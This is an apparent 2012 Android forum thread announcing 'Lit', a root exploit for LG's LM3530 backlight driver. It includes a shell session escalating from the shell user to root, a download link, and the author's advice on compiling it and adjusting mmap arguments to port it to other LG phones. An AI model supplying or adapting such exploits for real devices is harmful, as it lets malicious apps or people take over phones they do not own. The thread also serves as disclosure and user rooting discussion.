Root Privilidge Escailation exploit in LG's backlight driver

Discussion in 'Android Devices' started by giantpune, Oct 25, 2012.

  1. giantpune

    giantpune Well-Known Member
    88

    Jun 13, 2012
    452
    476
    88
    So yesterday I was messing around with trying to get cm7 working when I ran an innocent shell command and my phone crashed. I tracked the cause back to the driver for the backlight in our LCD screen. While I was looking at it, I saw that the bug I found could actually be used to gain root access on our phone from any app that runs.

    It took a couple hours to work up a working example for this that did something besides crash the phone, and named it 'Lit'. I already have quite a few root exploits for our phone saved up in case LG decides to fix the ones we have publicly. So theres nothing really to lose by not keeping this one to myself.

    I suspect this one also affect other LG phones using the same buggy backlight driver. I have hardcoded an address in this code. To get it working on other models, somebody would need to get the correct address. Lit is a commandline program, so run it from the terminal emulator or adb or something and hopefully it'll give you a root shell. You might also want to contact LG and demand they fix it. I'm not really going to bother with that since I called and emailed them back in July about another one and got ignored.

    Code (Text):
    1.  
    2. j@media-pc:~$ adb shell
    3. $ uname -a
    4. Linux localhost 2.6.35.11 #1 PREEMPT Tue Jun 19 23:02:28 KST 2012 armv7l GNU/Linux
    5. $ getprop | grep device
    6. [ro.product.device]: [m3s]
    7. $ id
    8. uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1009(mount),1011(adb),1015(sdcard_rw),3001(net_bt_admin),3002(net_bt),3003(inet)
    9. $ /data/local/tmp/lit
    10. Lit - root exploit for the LG LM3530 backlight driver
    11. 2012 giantpune
    12. [+] Using 29287461 as adapter address
    13. [+] Opened led reg file
    14. [+] Mapped 29287000
    15. [+] algoAddr is at 29287000
    16. [+] got root
    17. # id
    18. uid=0(root) gid=0(root)
    19. #
    20.  
    Download lit.tar.gz from Sendspace.com - send big files the easy way
     

    Advertisement
  2. kwknott

    kwknott Well-Known Member
    Contributor
    253

    Mar 19, 2012
    1,520
    729
    253
    Geez your finding more holes in this phone than Swiss cheese :D
     
  3. Curtis1973

    Curtis1973 Well-Known Member
    Contributor
    353

    Jul 1, 2012
    2,187
    1,658
    353
    Male
    Greenville,SC USA
    this phone doesnt have holes..it has BLACKHOLES lol
     
  4. HaTrEd360

    HaTrEd360 Well-Known Member
    143

    Aug 18, 2012
    1,363
    167
    143
    Male
    Lmfao xD
     
  5. ktb83

    ktb83 Well-Known Member
    93

    Jun 10, 2012
    653
    212
    93
    If any app can exploit a hole like this one, then Google Wallet has no business being on this phone. :D
     
    stormyhigh likes this.
  6. giantpune

    giantpune Well-Known Member
    88

    Jun 13, 2012
    452
    476
    88
    With multiple hole like this one, I wouldn't put my email address, credit card info, or any other personal information into this phone. If it wasn't a prepaid phone, I'd say to check your account every now and then and make sure there aren't any strange 1900 calls or texts sent to those premium numbers that charge you $2 a message.

    With any app being able to get root access whenever it wants, they can most certainly do all this stuff. Definitely make sure you only install apps from trusted places. It would be trivial to stick this or a similar exploit into anglybirds and toss it up on thepiratebay and before you know it, your phone becomes somebody else's phone.
     
    Dark One likes this.
  7. lphy

    lphy Member
    16

    May 1, 2013
    18
    1
    16
    giantpune, thanks for this great tool

    I am very curious about this small program you wrote, how do I re-compile main.c (If I want to do some changes and try it)

    what kind of tools did you use to compile it

    Thanks
     
  8. giantpune

    giantpune Well-Known Member
    88

    Jun 13, 2012
    452
    476
    88
    I used the gcc arm compiler from ndk r8(ish) to make the binary. As far as modifications go, I've found that if you tweak the mmap arguments a bit to get rid of the unnecessary executable permission, the mmap will succeed on some other devices and this exploit works. There are actually about 8 different backlight drivers from LG affected by this one, being used in several models. My root/cwm installer for the L38c family of phones uses this it ( http://androidforums.com/l3-all-things-root/682486-root-apk-l38c.html ).

    The optimus V 's backlight driver is also vulnerable, but as the cpu+kernel config is setup in a way that doesn't let us run unaligned addresses, the kernel panics rather than executing the specified address.
     
  9. lphy

    lphy Member
    16

    May 1, 2013
    18
    1
    16
    giantpune,

    Thanks for bunch for this useful information, I will start paying with the compiler to see whether I can compile it to run in my phone

    Thanks again
     

Share This Page

Loading...